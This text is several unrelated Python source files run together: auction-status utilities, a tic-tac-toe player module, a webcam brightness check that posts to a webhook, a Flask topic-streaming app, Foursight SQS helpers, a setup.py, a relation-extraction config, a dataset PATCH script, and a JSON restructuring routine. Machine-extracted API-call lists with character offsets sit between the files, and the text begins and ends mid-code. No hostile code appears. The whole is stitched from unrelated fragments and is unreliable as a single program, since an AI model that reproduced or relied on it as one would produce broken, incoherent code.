if lot['status'] != 'active':
continue
lot_awards = [i for i in auction.awards if i.lotID == lot.id]
standStillEnds = [
a.complaintPeriod.endDate.astimezone(TZ)
for a in lot_awards
if a.complaintPeriod.endDate
]
if not standStillEnds:
continue
standStillEnd = max(standStillEnds)
if standStillEnd <= now:
check_auction_status(request)
return
def invalidate_bids_under_threshold(auction):
value_threshold = round(auction['value']['amount'] + auction['minimalStep']['amount'], 2)
for bid in auction['bids']:
if bid['value']['amount'] < value_threshold:
bid['status'] = 'invalid'
| [
"logging.getLogger",
"openprocurement.auctions.core.utils.context_unpack",
"openprocurement.auctions.core.utils.get_now",
"openprocurement.auctions.core.utils.remove_draft_bids",
"openprocurement.auctions.core.utils.check_complaint_status",
"openprocurement.auctions.core.plugins.contracting.base.utils.che... | [((385, 414), 'pkg_resources.get_distribution', 'get_distribution', (['__package__'], {}), '(__package__)\n', (401, 414), False, 'from pkg_resources import get_distribution\n'), ((424, 451), 'logging.getLogger', 'getLogger', (['PKG.project_name'], {}), '(PKG.project_name)\n', (433, 451), False, 'from logging import getLogger\n'), ((1463, 1472), 'openprocurement.auctions.core.utils.get_now', 'get_now', ([], {}), '()\n', (1470, 1472), False, 'from openprocurement.auctions.core.utils import cleanup_bids_for_cancelled_lots, check_complaint_status, remove_draft_bids, context_unpack, get_now, TZ\n'), ((815, 855), 'openprocurement.auctions.core.utils.cleanup_bids_for_cancelled_lots', 'cleanup_bids_for_cancelled_lots', (['auction'], {}), '(auction)\n', (846, 855), False, 'from openprocurement.auctions.core.utils import cleanup_bids_for_cancelled_lots, check_complaint_status, remove_draft_bids, context_unpack, get_now, TZ\n'), ((1522, 1569), 'openprocurement.auctions.core.utils.check_complaint_status', 'check_complaint_status', (['request', 'complaint', 'now'], {}), '(request, complaint, now)\n', (1544, 1569), False, 'from openprocurement.auctions.core.utils import cleanup_bids_for_cancelled_lots, check_complaint_status, remove_draft_bids, context_unpack, get_now, TZ\n'), ((2130, 2156), 'openprocurement.auctions.core.utils.remove_draft_bids', 'remove_draft_bids', (['request'], {}), '(request)\n', (2147, 2156), False, 'from openprocurement.auctions.core.utils import cleanup_bids_for_cancelled_lots, check_complaint_status, remove_draft_bids, context_unpack, get_now, TZ\n'), ((1735, 1782), 'openprocurement.auctions.core.utils.check_complaint_status', 'check_complaint_status', (['request', 'complaint', 'now'], {}), '(request, complaint, now)\n', (1757, 1782), False, 'from openprocurement.auctions.core.utils import cleanup_bids_for_cancelled_lots, check_complaint_status, remove_draft_bids, context_unpack, get_now, TZ\n'), ((2545, 2571), 'openprocurement.auctions.core.utils.remove_draft_bids', 'remove_draft_bids', (['request'], {}), '(request)\n', (2562, 2571), False, 'from openprocurement.auctions.core.utils import cleanup_bids_for_cancelled_lots, check_complaint_status, remove_draft_bids, context_unpack, get_now, TZ\n'), ((2004, 2078), 'openprocurement.auctions.core.utils.context_unpack', 'context_unpack', (['request', "{'MESSAGE_ID': 'switched_auction_active.auction'}"], {}), "(request, {'MESSAGE_ID': 'switched_auction_active.auction'})\n", (2018, 2078), False, 'from openprocurement.auctions.core.utils import cleanup_bids_for_cancelled_lots, check_complaint_status, remove_draft_bids, context_unpack, get_now, TZ\n'), ((2419, 2493), 'openprocurement.auctions.core.utils.context_unpack', 'context_unpack', (['request', "{'MESSAGE_ID': 'switched_auction_active.auction'}"], {}), "(request, {'MESSAGE_ID': 'switched_auction_active.auction'})\n", (2433, 2493), False, 'from openprocurement.auctions.core.utils import cleanup_bids_for_cancelled_lots, check_complaint_status, remove_draft_bids, context_unpack, get_now, TZ\n'), ((3105, 3134), 'openprocurement.auctions.core.plugins.contracting.base.utils.check_auction_status', 'check_auction_status', (['request'], {}), '(request)\n', (3125, 3134), False, 'from openprocurement.auctions.core.plugins.contracting.base.utils import check_auction_status\n'), ((3878, 3907), 'openprocurement.auctions.core.plugins.contracting.base.utils.check_auction_status', 'check_auction_status', (['request'], {}), '(request)\n', (3898, 3907), False, 'from openprocurement.auctions.core.plugins.contracting.base.utils import check_auction_status\n')] |
import sys
from Training.observer_abilities import *
from Training.cortex_3x3_caddy import *
class Player(Observer):
def __init__(self, marker_code):
self.ui = None
self.marker_code = marker_code
def get_enemy_code(self):
if self.marker_code == 10:
return 1
return 10
def move(self, table_top):
choice = self.choose(table_top)
table_top.board[choice] = self.marker_code
return table_top.board
def choose(self, table_top):
options = self.get_legal_moves(table_top.board)
return options[0]
def get_legal_moves(self, board):
legal_moves = []
for i in range(0, len(board)):
if board[i] != 1 and board[i] != 10:
legal_moves.append(i)
return legal_moves
class Human(Player):
name = 'human'
strikes = 0
def choose(self, table_top):
choice = self.get_good_input(table_top)
if self.check_conscience(choice, table_top.board):
return self.redo_move(table_top)
else:
self.reset_strikes()
return choice
def get_good_input(self, board):
try:
return int(self.ui.ask_human()) -1
except(ValueError):
return self.redo_move(board)
def check_conscience(self, choice, board):
if choice not in self.get_legal_moves(board):
return True
def redo_move(self, table_top):
self.add_a_strike(table_top)
table_top.error = True
self.ui.refresh()
return self.choose(table_top)
def add_a_strike(self, table_top):
self.strikes += 1
if self.strikes == 3:
table_top.exit = True
self.ui.refresh()
sys.exit()
def reset_strikes(self):
self.strikes = 0
class Computer(Player):
name = 'computer'
cortex = Cortex_3x3()
def choose(self, table_top):
intel = self.get_intelligence(table_top.board)
choice = self.cortex.direct_move(intel)
return choice
def get_intelligence(self, board):
return { 'board': board,
'options': self.get_legal_moves(board),
'analysis': self.scan_board(board),
'marker_code': self.marker_code,
'enemy_code': self.get_enemy_code() }
| [
"sys.exit"
] | [((1773, 1783), 'sys.exit', 'sys.exit', ([], {}), '()\n', (1781, 1783), False, 'import sys\n')] |
import cv2
import numpy as np
from numpy.linalg import norm
import requests
def _get_image_frame(camera) -> np.ndarray:
_, frame = camera.read()
return frame
def _convert_frame_to_hsv(frame: np.ndarray) -> np.ndarray:
return cv2.cvtColor(frame, cv2.COLOR_BGR2HSV)
def _post_to_michi() -> None:
try:
requests.post("https://tbaum.duckdns.org/api/webhook/awesome-leanix")
except Exception:
_post_to_michi()
def main() -> None:
camera = cv2.VideoCapture(0)
while True:
frame = _get_image_frame(camera)
hsv_img = _convert_frame_to_hsv(frame)
if np.average(norm(hsv_img, axis=2)) / np.sqrt(3) > 110:
_post_to_michi()
break
print("Success!")
if __name__ == "__main__":
main() | [
"requests.post",
"numpy.sqrt",
"cv2.VideoCapture",
"cv2.cvtColor",
"numpy.linalg.norm"
] | [((239, 277), 'cv2.cvtColor', 'cv2.cvtColor', (['frame', 'cv2.COLOR_BGR2HSV'], {}), '(frame, cv2.COLOR_BGR2HSV)\n', (251, 277), False, 'import cv2\n'), ((477, 496), 'cv2.VideoCapture', 'cv2.VideoCapture', (['(0)'], {}), '(0)\n', (493, 496), False, 'import cv2\n'), ((326, 395), 'requests.post', 'requests.post', (['"""https://tbaum.duckdns.org/api/webhook/awesome-leanix"""'], {}), "('https://tbaum.duckdns.org/api/webhook/awesome-leanix')\n", (339, 395), False, 'import requests\n'), ((650, 660), 'numpy.sqrt', 'np.sqrt', (['(3)'], {}), '(3)\n', (657, 660), True, 'import numpy as np\n'), ((625, 646), 'numpy.linalg.norm', 'norm', (['hsv_img'], {'axis': '(2)'}), '(hsv_img, axis=2)\n', (629, 646), False, 'from numpy.linalg import norm\n')] |
from flask import Flask, render_template, Response
from topicsconsumer import TopicsConsumer
import math
import time
import queue
import threading
import json
app = Flask(__name__)
@app.route('/', methods=['GET', 'POST'])
def searchTopic():
return render_template('base.html')
@app.route('/topics', methods=['GET', 'POST'])
def getTopics():
return render_template('topics.html')
@app.route('/newsandtopics', methods=['GET', 'POST'])
def newsandtopics():
try:
def inner():
newsq = queue.Queue()
cosumerObj = TopicsConsumer(newsq)
cosumerObj.startConsumer()
time.sleep(10)
while True:
obj = json.loads(newsq.get())
# content and topics
content = json.loads(obj[0])
topics = obj[1]
yield '***********************START*********************' + '\r\n' +'News : ' + '\r\n' +content['content'] + '\r\n' + '\r\n' +'Topics : ' + '\r\n' +topics +'\r\n'+'***********************END*********************'+ '\r\n'
time.sleep(10)
return Response(inner(), mimetype='text/event-stream')
except Exception as ex:
print(ex)
if __name__ == '__main__':
app.run(debug=True,port=5050)
| [
"flask.render_template",
"topicsconsumer.TopicsConsumer",
"json.loads",
"flask.Flask",
"time.sleep",
"queue.Queue"
] | [((166, 181), 'flask.Flask', 'Flask', (['__name__'], {}), '(__name__)\n', (171, 181), False, 'from flask import Flask, render_template, Response\n'), ((254, 282), 'flask.render_template', 'render_template', (['"""base.html"""'], {}), "('base.html')\n", (269, 282), False, 'from flask import Flask, render_template, Response\n'), ((359, 389), 'flask.render_template', 'render_template', (['"""topics.html"""'], {}), "('topics.html')\n", (374, 389), False, 'from flask import Flask, render_template, Response\n'), ((516, 529), 'queue.Queue', 'queue.Queue', ([], {}), '()\n', (527, 529), False, 'import queue\n'), ((555, 576), 'topicsconsumer.TopicsConsumer', 'TopicsConsumer', (['newsq'], {}), '(newsq)\n', (569, 576), False, 'from topicsconsumer import TopicsConsumer\n'), ((628, 642), 'time.sleep', 'time.sleep', (['(10)'], {}), '(10)\n', (638, 642), False, 'import time\n'), ((776, 794), 'json.loads', 'json.loads', (['obj[0]'], {}), '(obj[0])\n', (786, 794), False, 'import json\n'), ((1093, 1107), 'time.sleep', 'time.sleep', (['(10)'], {}), '(10)\n', (1103, 1107), False, 'import time\n')] |
from datetime import datetime
import boto3
import json
from .stage import Stage
class SQS(object):
"""
class SQS is a collection of utils related to Foursight queues
"""
def __init__(self, foursight_prefix):
self.stage = Stage(foursight_prefix)
def invoke_check_runner(self, runner_input):
"""
Simple function to invoke the next check_runner lambda with runner_input
(dict containing {'sqs_url': <str>})
"""
client = boto3.client('lambda')
# InvocationType='Event' makes asynchronous
# try/except while async invokes are problematic
try:
response = client.invoke(
FunctionName=self.stage.get_runner_name(),
InvocationType='Event',
Payload=json.dumps(runner_input)
)
except:
response = client.invoke(
FunctionName=self.stage.get_runner_name(),
Payload=json.dumps(runner_input)
)
return response
def delete_message_and_propogate(self, runner_input, receipt, propogate=True):
"""
Delete the message with given receipt from sqs queue and invoke the next
lambda runner.
Args:
runner_input (dict): runner info, should minimally have 'sqs_url'
receipt (str): SQS message receipt
propogate (bool): if True (default), invoke another check runner lambda
Returns:
None
"""
sqs_url = runner_input.get('sqs_url')
if not sqs_url or not receipt:
return
client = boto3.client('sqs')
client.delete_message(
QueueUrl=sqs_url,
ReceiptHandle=receipt
)
if propogate is True:
self.invoke_check_runner(runner_input)
def recover_message_and_propogate(self, runner_input, receipt, propogate=True):
"""
Recover the message with given receipt to sqs queue and invoke the next
lambda runner.
Changing message VisibilityTimeout to 15 seconds means the message will be
available to the queue in that much time. This is a slight lag to allow
dependencies to process.
NOTE: VisibilityTimeout should be less than WaitTimeSeconds in run_check_runner
Args:
runner_input (dict): runner info, should minimally have 'sqs_url'
receipt (str): SQS message receipt
propogate (bool): if True (default), invoke another check runner lambda
Returns:
None
"""
sqs_url = runner_input.get('sqs_url')
if not sqs_url or not receipt:
return
client = boto3.client('sqs')
client.change_message_visibility(
QueueUrl=sqs_url,
ReceiptHandle=receipt,
VisibilityTimeout=15
)
if propogate is True:
self.invoke_check_runner(runner_input)
def get_sqs_queue(self):
"""
Returns boto3 sqs resource
"""
queue_name = self.stage.get_queue_name()
sqs = boto3.resource('sqs')
try:
queue = sqs.get_queue_by_name(QueueName=queue_name)
except:
queue = sqs.create_queue(
QueueName=queue_name,
Attributes={
'VisibilityTimeout': '900',
'MessageRetentionPeriod': '3600'
}
)
return queue
@classmethod
def send_sqs_messages(cls, queue, environ, check_vals, uuid=None):
"""
Send messages to SQS queue. Check_vals are entries within a check_group.
Optionally, provide a uuid that will be queued as the uuid for the run; if
not provided, datetime.utcnow is used
Args:
queue: boto3 sqs resource (from get_sqs_queue)
environ (str): foursight environment name
check_vals (list): list of formatted check vals, like those from
check_utils.CheckHandler().get_check_schedule
uuid (str): optional string uuid
Returns:
str: uuid of queued messages
"""
# uuid used as the MessageGroupId
if not uuid:
uuid = datetime.utcnow().isoformat()
# append environ and uuid as first elements to all check_vals
proc_vals = [[environ, uuid] + val for val in check_vals]
for val in proc_vals:
response = queue.send_message(MessageBody=json.dumps(val))
return uuid
@classmethod
def get_sqs_attributes(cls, sqs_url):
"""
Returns a dict of the desired attributes form the queue with given url
"""
backup = {
'ApproximateNumberOfMessages': 'ERROR',
'ApproximateNumberOfMessagesNotVisible': 'ERROR'
}
client = boto3.client('sqs')
try:
result = client.get_queue_attributes(
QueueUrl=sqs_url,
AttributeNames=[
'ApproximateNumberOfMessages',
'ApproximateNumberOfMessagesNotVisible'
]
)
except:
return backup
return result.get('Attributes', backup)
| [
"boto3.resource",
"json.dumps",
"boto3.client",
"datetime.datetime.utcnow"
] | [((489, 511), 'boto3.client', 'boto3.client', (['"""lambda"""'], {}), "('lambda')\n", (501, 511), False, 'import boto3\n'), ((1626, 1645), 'boto3.client', 'boto3.client', (['"""sqs"""'], {}), "('sqs')\n", (1638, 1645), False, 'import boto3\n'), ((2709, 2728), 'boto3.client', 'boto3.client', (['"""sqs"""'], {}), "('sqs')\n", (2721, 2728), False, 'import boto3\n'), ((3112, 3133), 'boto3.resource', 'boto3.resource', (['"""sqs"""'], {}), "('sqs')\n", (3126, 3133), False, 'import boto3\n'), ((4871, 4890), 'boto3.client', 'boto3.client', (['"""sqs"""'], {}), "('sqs')\n", (4883, 4890), False, 'import boto3\n'), ((795, 819), 'json.dumps', 'json.dumps', (['runner_input'], {}), '(runner_input)\n', (805, 819), False, 'import json\n'), ((4262, 4279), 'datetime.datetime.utcnow', 'datetime.utcnow', ([], {}), '()\n', (4277, 4279), False, 'from datetime import datetime\n'), ((4512, 4527), 'json.dumps', 'json.dumps', (['val'], {}), '(val)\n', (4522, 4527), False, 'import json\n'), ((971, 995), 'json.dumps', 'json.dumps', (['runner_input'], {}), '(runner_input)\n', (981, 995), False, 'import json\n')] |
#!/usr/bin/env python
import os
from setuptools import setup
from setuptools.command.install import install
LONG_DESCRIPTION = ""
with open(os.path.join(os.path.dirname(__file__), 'README.md'), 'r') as f:
LONG_DESCRIPTION = f.read()
setup(
name='shadho',
version='0.4.3.post2',
description='Hyperparameter optimizer with distributed hardware at heart',
long_description=LONG_DESCRIPTION,
long_description_content_type='text/markdown',
url='https://github.com/jeffkinnison/shadho',
author='<NAME>',
author_email='<EMAIL>',
python_requires='>=3.5',
packages=['shadho',
'shadho.installers',
'shadho.managers',
'shadho.workers',],
classifiers=[
'Development Status :: 4 - Beta',
'Intended Audience :: Science/Research',
'License :: OSI Approved :: MIT License',
'Topic :: Scientific/Engineering :: Artificial Intelligence',
'Programming Language :: Python :: 3',
'Programming Language :: Python :: 3.5',
'Programming Language :: Python :: 3.6',
'Programming Language :: Python :: 3.7',
'Operating System :: POSIX',
'Operating System :: Unix',
],
keywords='machine_learning hyperparameters distributed_computing',
install_requires=[
'numpy',
'scipy',
'scikit-learn',
'pyrameter'
],
tests_require=['pytest'],
include_package_data=True,
)
| [
"os.path.dirname",
"setuptools.setup"
] | [((240, 1302), 'setuptools.setup', 'setup', ([], {'name': '"""shadho"""', 'version': '"""0.4.3.post2"""', 'description': '"""Hyperparameter optimizer with distributed hardware at heart"""', 'long_description': 'LONG_DESCRIPTION', 'long_description_content_type': '"""text/markdown"""', 'url': '"""https://github.com/jeffkinnison/shadho"""', 'author': '"""<NAME>"""', 'author_email': '"""<EMAIL>"""', 'python_requires': '""">=3.5"""', 'packages': "['shadho', 'shadho.installers', 'shadho.managers', 'shadho.workers']", 'classifiers': "['Development Status :: 4 - Beta', 'Intended Audience :: Science/Research',\n 'License :: OSI Approved :: MIT License',\n 'Topic :: Scientific/Engineering :: Artificial Intelligence',\n 'Programming Language :: Python :: 3',\n 'Programming Language :: Python :: 3.5',\n 'Programming Language :: Python :: 3.6',\n 'Programming Language :: Python :: 3.7', 'Operating System :: POSIX',\n 'Operating System :: Unix']", 'keywords': '"""machine_learning hyperparameters distributed_computing"""', 'install_requires': "['numpy', 'scipy', 'scikit-learn', 'pyrameter']", 'tests_require': "['pytest']", 'include_package_data': '(True)'}), "(name='shadho', version='0.4.3.post2', description=\n 'Hyperparameter optimizer with distributed hardware at heart',\n long_description=LONG_DESCRIPTION, long_description_content_type=\n 'text/markdown', url='https://github.com/jeffkinnison/shadho', author=\n '<NAME>', author_email='<EMAIL>', python_requires='>=3.5', packages=[\n 'shadho', 'shadho.installers', 'shadho.managers', 'shadho.workers'],\n classifiers=['Development Status :: 4 - Beta',\n 'Intended Audience :: Science/Research',\n 'License :: OSI Approved :: MIT License',\n 'Topic :: Scientific/Engineering :: Artificial Intelligence',\n 'Programming Language :: Python :: 3',\n 'Programming Language :: Python :: 3.5',\n 'Programming Language :: Python :: 3.6',\n 'Programming Language :: Python :: 3.7', 'Operating System :: POSIX',\n 'Operating System :: Unix'], keywords=\n 'machine_learning hyperparameters distributed_computing',\n install_requires=['numpy', 'scipy', 'scikit-learn', 'pyrameter'],\n tests_require=['pytest'], include_package_data=True)\n", (245, 1302), False, 'from setuptools import setup\n'), ((154, 179), 'os.path.dirname', 'os.path.dirname', (['__file__'], {}), '(__file__)\n', (169, 179), False, 'import os\n')] |
import os
class config():
input_dir = ''
max_len = '128'
pretrain_model_dir = ''
home_dir = os.getcwd() + '/'
data_dir = home_dir + 'raw_data/ske/'
tf_serving_addr = '127.0.0.1:8501'
bert_vocab_dir = home_dir + 'pretrained_model/chinese_wwm_ext_L-12_H-768_A-12/vocab.txt'
bert_config_dir =home_dir + 'pretrained_model/chinese_wwm_ext_L-12_H-768_A-12/bert_config.json'
class_model_dir = 'output/predicate_classification_model/epochs6/model.ckpt-6000'
seq_model_dir = 'output/sequnce_labeling_model/epochs9/model.ckpt-85304'
middle_out_dir = './output/predicate_infer_out'
out_dir = './output/sequnce_infer_out/epochs9/ckpt22000'
token_label = ["[Padding]", "[category]", "[##WordPiece]", "[CLS]", "[SEP]", "B-SUB", "I-SUB", "B-OBJ", "I-OBJ", "O"] #id 0 --> [Paddding]
#class_label = ['所需检查', '推荐用药', '疾病症状', '治疗方式']
class_label = ['丈夫', '上映时间', '专业代码', '主持人', '主演', '主角', '人口数量', '作曲', '作者', '作词', '修业年限', '出品公司', '出版社', '出生地', '出生日期','创始人', '制片人', '占地面积', '号', '嘉宾', '国籍', '妻子', '字', '官方语言', '导演', '总部地点', '成立日期', '所在城市', '所属专辑', '改编自', '朝代', '歌手', '母亲', '毕业院校', '民族', '气候', '注册资本', '海拔', '父亲', '目', '祖籍', '简称', '编剧', '董事长', '身高', '连载网站','邮政编码', '面积', '首都']
schema = {
'父亲': [('人物', '人物')],
'妻子': [('人物', '人物')],
'母亲': [('人物', '人物')],
'丈夫': [('人物', '人物')],
'祖籍': [('地点', '人物')],
'总部地点': [('地点', '企业')],
'出生地': [('地点', '人物')],
'目': [('目', '生物')],
'面积': [('Number', '行政区')],
'简称': [('Text', '机构')],
'上映时间': [('Date', '影视作品')],
'所属专辑': [('音乐专辑', '歌曲')],
'注册资本': [('Number', '企业')],
'首都': [('城市', '国家')],
'导演': [('人物', '影视作品')],
'字': [('Text', '历史人物')],
'身高': [('Number', '人物')],
'出品公司': [('企业', '影视作品')],
'修业年限': [('Number', '学科专业')],
'出生日期': [('Date', '人物')],
'制片人': [('人物', '影视作品')],
'编剧': [('人物', '影视作品')],
'国籍': [('国家', '人物')],
'海拔': [('Number', '地点')],
'连载网站': [('网站', '网络小说')],
'朝代': [('Text', '历史人物')],
'民族': [('Text', '人物')],
'号': [('Text', '历史人物')],
'出版社': [('出版社', '书籍')],
'主持人': [('人物', '电视综艺')],
'专业代码': [('Text', '学科专业')],
'歌手': [('人物', '歌曲')],
'作词': [('人物', '歌曲')],
'主角': [('人物', '网络小说')],
'董事长': [('人物', '企业')],
'成立日期': [('Date', '机构'), ('Date', '企业')],
'毕业院校': [('学校', '人物')],
'占地面积': [('Number', '机构')],
'官方语言': [('语言', '国家')],
'邮政编码': [('Text', '行政区')],
'人口数量': [('Number', '行政区')],
'所在城市': [('城市', '景点')],
'作者': [('人物', '图书作品')],
'作曲': [('人物', '歌曲')],
'气候': [('气候', '行政区')],
'嘉宾': [('人物', '电视综艺')],
'主演': [('人物', '影视作品')],
'改编自': [('作品', '影视作品')],
'创始人': [('人物', '企业')]}
| [
"os.getcwd"
] | [((108, 119), 'os.getcwd', 'os.getcwd', ([], {}), '()\n', (117, 119), False, 'import os\n')] |
import json
import sys
import os
import requests
from datasets.diff_helper import DiffHelper
from common.constants import BASE_HEADERS, FAIR_API_ENDPOINT, SSL_VERIFY, FAIR_URL, DRY_RUN
def dataset_url(code):
return f"{FAIR_API_ENDPOINT}{code}"
def get_request(dataset_code):
resp = requests.get(
dataset_url(dataset_code), headers=BASE_HEADERS, verify=SSL_VERIFY
)
if resp.status_code != 200:
data = resp.json()
print(f'\nFailed to get dataset: Status code: {resp.status_code}, Error message: {data["error"]["message"]}')
exit(1)
return resp
def patch_request(data):
dataset_code = data['catalogue']['id']
resp = get_request(dataset_code)
original = resp.json()
diff = DiffHelper.dataset_diff(original, data)
print (f'\nPATCH {dataset_url(dataset_code)} --data {json.dumps(diff, indent=2)}')
if DRY_RUN:
return # In dry-run mode we do nothing past this point
print('Sending request...')
response = requests.patch(
dataset_url(dataset_code),
headers=BASE_HEADERS,
json=diff,
verify=SSL_VERIFY
)
data = response.json()
if response.status_code != 200:
print(f'Failed to patch dataset: Status code: {response.status_code}, Error message: {data["error"]["message"]}')
exit(1)
if len(data) != 1:
print(f'Patched dataset: {data["code"]}')
print(f'View on the web at: {FAIR_URL}#/data/datasets/{data["code"]}')
else:
print(f'Expected 1 dataset in response - received {(data)}')
# Script must be run with at least 1 argument
if len(sys.argv) < 2:
print(f'Usage: {sys.argv[0]} <path to dataset definition json file> <--dry-run>')
exit(1)
# First argument must be a path to a file
definition_file = sys.argv[1]
if not os.path.isfile(definition_file):
print(f'Provided path "{definition_file}" does not seem to be a file, ensure the path is correct and try again')
exit(1)
with open(definition_file) as fh:
payload=fh.read()
data=json.loads(payload)
patch_request(data)
| [
"os.path.isfile",
"json.dumps",
"json.loads",
"datasets.diff_helper.DiffHelper.dataset_diff"
] | [((740, 779), 'datasets.diff_helper.DiffHelper.dataset_diff', 'DiffHelper.dataset_diff', (['original', 'data'], {}), '(original, data)\n', (763, 779), False, 'from datasets.diff_helper import DiffHelper\n'), ((1804, 1835), 'os.path.isfile', 'os.path.isfile', (['definition_file'], {}), '(definition_file)\n', (1818, 1835), False, 'import os\n'), ((2032, 2051), 'json.loads', 'json.loads', (['payload'], {}), '(payload)\n', (2042, 2051), False, 'import json\n'), ((837, 863), 'json.dumps', 'json.dumps', (['diff'], {'indent': '(2)'}), '(diff, indent=2)\n', (847, 863), False, 'import json\n')] |
import os
import json
from collections import OrderedDict
import pandas as pd
def write_json_to_file(json_data, json_file_path):
parsed = json.loads(json_data)
parsed = json.dumps(parsed, indent=4, sort_keys=True)
obj = open(json_file_path, 'w')
obj.write(parsed)
obj.close()
# replace " with ' if the occur within brackets
# eg {"key":"["Key":"value"]"} => {"key":"['Key':'value']"}
def standardize_json_string(json_string):
inside_brackets_flag = False
standard_json_string = ""
for i in range(0, len(json_string)):
if json_string[i] == '[':
inside_brackets_flag = True
if json_string[i] == ']':
inside_brackets_flag = False
if inside_brackets_flag:
if json_string[i] == '\"':
standard_json_string += "\'"
else:
standard_json_string += json_string[i]
else:
standard_json_string += json_string[i]
# Note: json object cant have python lists as keys
# standard_json_string \
# = standard_json_string.replace("\"[","[").replace("]\"","]")
return standard_json_string
def update_json_structure(main_json_obj):
system_meta = main_json_obj["system_meta"]
sysout_setup = main_json_obj["sysout_setup"]
sysinp_setup = main_json_obj["sysinp_setup"]
node_conn_df = main_json_obj["node_conn_df"]
component_list = main_json_obj["component_list"]
damage_state_df = main_json_obj["damage_state_df"]
fragility_data = main_json_obj["fragility_data"]
new_json_structure = OrderedDict()
new_json_structure["system_meta"] = system_meta
new_json_structure["sysout_setup"] = sysout_setup
new_json_structure["sysinp_setup"] = sysinp_setup
new_json_structure["node_conn_df"] = node_conn_df
new_json_structure["component_list"] = OrderedDict()
for component in component_list:
new_json_structure["component_list"][component] = OrderedDict()
new_json_structure["component_list"][component]["component_class"] \
= component_list[component]["component_class"]
new_json_structure["component_list"][component]["component_type"] \
= component_list[component]["component_type"]
new_json_structure["component_list"][component]["cost_fraction"] \
= component_list[component]["cost_fraction"]
new_json_structure["component_list"][component]["node_cluster"] \
= component_list[component]["node_cluster"]
new_json_structure["component_list"][component]["node_type"] \
= component_list[component]["node_type"]
new_json_structure["component_list"][component]["operating_capacity"] \
= component_list[component]["op_capacity"]
new_json_structure["component_list"][component]["longitude"] \
= component_list[component]["pos_x"]
new_json_structure["component_list"][component]["latitude"] \
= component_list[component]["pos_y"]
new_json_structure["component_list"][component]\
["damages_states_constructor"] = OrderedDict()
new_json_structure["component_list"][component]\
["damages_states_constructor"]["0"] = OrderedDict()
new_json_structure["component_list"][component]\
["damages_states_constructor"]["0"]["damage_state_name"] \
= "DS0 None"
new_json_structure["component_list"][component]\
["damages_states_constructor"]["0"]["functionality"]\
= 1.0
new_json_structure["component_list"][component]\
["damages_states_constructor"]["0"]["damage_ratio"]\
= 0.0
new_json_structure["component_list"][component]\
["damages_states_constructor"]["0"]\
["response_function_constructor"]\
= OrderedDict()
new_json_structure["component_list"][component]\
["damages_states_constructor"]["0"]\
["response_function_constructor"]\
["function_name"] \
= "Level0Response"
new_json_structure["component_list"][component]\
["damages_states_constructor"]["0"]\
["response_function_constructor"]\
["damage_state_definition"]\
= "Not Available."
new_json_structure["component_list"][component]\
["damages_states_constructor"]["0"]\
["recovery_function_constructor"]\
= OrderedDict()
new_json_structure["component_list"][component]\
["damages_states_constructor"]["0"]\
["recovery_function_constructor"]["function_name"]\
= "Level0Response"
new_json_structure["component_list"][component]\
["damages_states_constructor"]["0"]\
["recovery_function_constructor"]["recovery_state_definition"]\
= "Not Available."
counter = 0
for key in fragility_data.keys():
component_type = eval(key)[1]
damage_state = eval(key)[2]
if component_type == component_list[component]["component_type"]:
damage_states_in_component = [
new_json_structure["component_list"][component]\
["damages_states_constructor"][ds]["damage_state_name"]
for ds in
new_json_structure["component_list"][component]\
["damages_states_constructor"]
]
if damage_state not in damage_states_in_component:
counter = counter + 1
new_json_structure["component_list"][component]\
["damages_states_constructor"][counter]\
= OrderedDict()
new_json_structure["component_list"][component]\
["damages_states_constructor"][counter]\
["damage_state_name"]\
= damage_state
new_json_structure["component_list"][component]\
["damages_states_constructor"][counter]\
["functionality"]\
= fragility_data[key]["functionality"]
new_json_structure["component_list"][component]\
["damages_states_constructor"][counter]\
["damage_ratio"]\
= fragility_data[key]["damage_ratio"]
new_json_structure["component_list"][component]\
["damages_states_constructor"][counter]\
["response_function_constructor"]\
= OrderedDict()
if fragility_data[key]["is_piecewise"] == "no":
# -----------------------------------------------------
# <BEGIN> Non-piecewise damage function
new_json_structure["component_list"][component]\
["damages_states_constructor"][counter]\
["response_function_constructor"]\
["function_name"]\
= fragility_data[key]["damage_function"]
new_json_structure["component_list"][component]\
["damages_states_constructor"][counter]\
["response_function_constructor"]\
["median"]\
= fragility_data[key]["median"]
new_json_structure["component_list"][component]\
["damages_states_constructor"][counter]\
["response_function_constructor"]\
["beta"]\
= fragility_data[key]["beta"]
new_json_structure["component_list"][component]\
["damages_states_constructor"][counter]\
["response_function_constructor"]\
["location"]\
= fragility_data[key]["location"]
new_json_structure["component_list"][component]\
["damages_states_constructor"][counter]\
["response_function_constructor"]\
["fragility_source"]\
= fragility_data[key]["fragility_source"]
new_json_structure["component_list"][component]\
["damages_states_constructor"][counter]\
["response_function_constructor"]\
["minimum"]\
= fragility_data[key]["minimum"]
if key in damage_state_df.keys():
new_json_structure["component_list"][component]\
["damages_states_constructor"][counter]\
["response_function_constructor"]\
["damage_state_definition"]\
= damage_state_df[str(eval(key).pop(0))]
else:
new_json_structure["component_list"][component]\
["damages_states_constructor"][counter]\
["response_function_constructor"]\
["damage_state_definition"]\
= "Not Available."
# <END> Non-piecewise damage function
# ---------------------------------------------------------
# <BEGIN> Piecewise defined damage function
else:
new_json_structure["component_list"][component]\
["damages_states_constructor"][counter]\
["response_function_constructor"]\
["function_name"] = "PiecewiseFunction"
new_json_structure["component_list"][component]\
["damages_states_constructor"][counter]\
["response_function_constructor"]\
["piecewise_function_constructor"] = []
tempDic = OrderedDict()
tempDic["function_name"]\
= fragility_data[key]["damage_function"]
tempDic["median"]\
= fragility_data[key]["median"]
tempDic["beta"]\
= fragility_data[key]["beta"]
tempDic["location"]\
= fragility_data[key]["location"]
tempDic["fragility_source"]\
= fragility_data[key]["fragility_source"]
tempDic["minimum"]\
= fragility_data[key]["minimum"]
if key in damage_state_df.keys():
tempDic["damage_state_definition"]\
= damage_state_df[str(eval(key).pop(0))]
else:
tempDic["damage_state_definition"]\
= "Not Available."
new_json_structure["component_list"][component]\
["damages_states_constructor"][counter]\
["response_function_constructor"]\
["piecewise_function_constructor"].append(tempDic)
# <END> Piecewise defined damage function
# ---------------------------------------------------------
new_json_structure["component_list"][component]\
["damages_states_constructor"][counter]\
["recovery_function_constructor"]\
= OrderedDict()
new_json_structure["component_list"][component]\
["damages_states_constructor"][counter]\
["recovery_function_constructor"]\
["function_name"]\
= fragility_data[key]["recovery_function"]
new_json_structure["component_list"][component]\
["damages_states_constructor"][counter]\
["recovery_function_constructor"]\
["norm_mean"]\
= fragility_data[key]["recovery_mean"]
new_json_structure["component_list"][component]\
["damages_states_constructor"][counter]\
["recovery_function_constructor"]\
["norm_stddev"]\
= fragility_data[key]["recovery_std"]
new_json_structure["component_list"][component]\
